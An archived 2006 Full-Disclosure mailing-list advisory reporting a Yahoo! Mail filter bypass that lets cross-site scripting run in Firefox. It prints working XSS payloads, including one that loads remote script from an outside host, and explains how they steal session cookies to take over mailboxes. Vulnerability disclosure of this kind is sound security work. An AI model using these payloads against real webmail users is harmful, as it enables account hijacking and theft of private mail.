Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] Yahoo! Mail + Firefox Filter Bypass

from [simo] Network Security [Permanent Link]
Subject: [Full-disclosure] Yahoo! Mail + Firefox Filter Bypass
Date: Thu, 27 Jul 2006 03:06:09 -0000 (GMT) 
Title: Yahoo! Mail Filter Bypass

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: january 2006
published: 26 july 2006
MorX Security Research Team
http://www.morx.org
http://www.morx.org/yahoo-firefox-bypass.txt

Service: Webmail

Vendor: Yahoo mail, and possibly others

Vulnerability: Filter bypass / Cross Site Scripting

Severity: Medium/High

Tested to be vulnerable on: FireFox 1.5.0.4

not vulnerable: Microsoft IE 6.0, Opera 8.54

Details:

few months ago i have published a vulnerability affecting Yahoo mail with
MS IE, where yahoo mail filter failed to detect script attributes in
combination with the style attribute as a tag,

the combination code was:
<STYLE onload="alert(document.cookie)"> </STYLE>

few days later yahoo patched the above combination

so now if you try to send your self that code, you will see that yahoo
filters it this way

<style onfiltered="alert(document.cookie)"> </style>

this is not a good way of filtering, since yahoo filtered only the
"onload" attribute

few days later i received some emails asking how a similar
bypass-combination can be executed on other browsers such as firefox since
that one worked only on IE, after making some tests i realised that
firefox will execute any js code proceeded by <style as a tag

example:

<style <script>alert('a')</script>
or
<style <body onload="alert('a')">

note that <style must be left open, if you close it with </style> firefox
wont execute the js code

in fact the first combination will not be filtered by yahoo mail, usualy
yahoo filters <script> and </script> but if proceeded by the <style tag it
wont be filtered at all which will lead to script execution on firefox and
leads to user account compromise

exploit code example

<style <script>alert(document.cookie)</script>

<style <script SRC=http://www.morx.org/xss.js></script>

as you can see here from my yahoo mail message source code, the code is
left unfiltered:


<div id=message>


<!-- type = text -->


<style <script SRC=http://www.morx.org/xss.js></script><BR>


Impact:

an attacker can send the unfiltered code as an html email to a yahoo mail
user with FireFox. Once the victim opens the malicious email the
javascript content will be executed in the the target browser. This will
allow user's session cookie theft, giving the attacker access to the
victim mail box for about 24 hours (until the cookie expires)

Screen captures:

www.morx.org/yahoo-firefox-bypass.jpg

workaround:

Switch to another browser, or disable script execution until a patch is
released

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The exploit code is to be used on your OWN email account. I
cannot be held responsible for any of the above. comments or additional
questions feel free to email me at simo_at_morx_org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] Yahoo! Mail + Firefox Filter Bypass, simo <=
Previous by Date:  Re: [security] Trojan downloader may be dropping FireFox and IE specific components, Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP]
Next by Date:  [Full-disclosure] [USN-324-1] freetype vulnerability, Martin Pitt
Previous by Thread:  [Full-disclosure] rPSA-2006-0137-1 firefox, Justin M. Forbes
Next by Thread:  [Full-disclosure] [USN-324-1] freetype vulnerability, Martin Pitt
Indexes:  [Date] [Thread] [Top] [All Lists]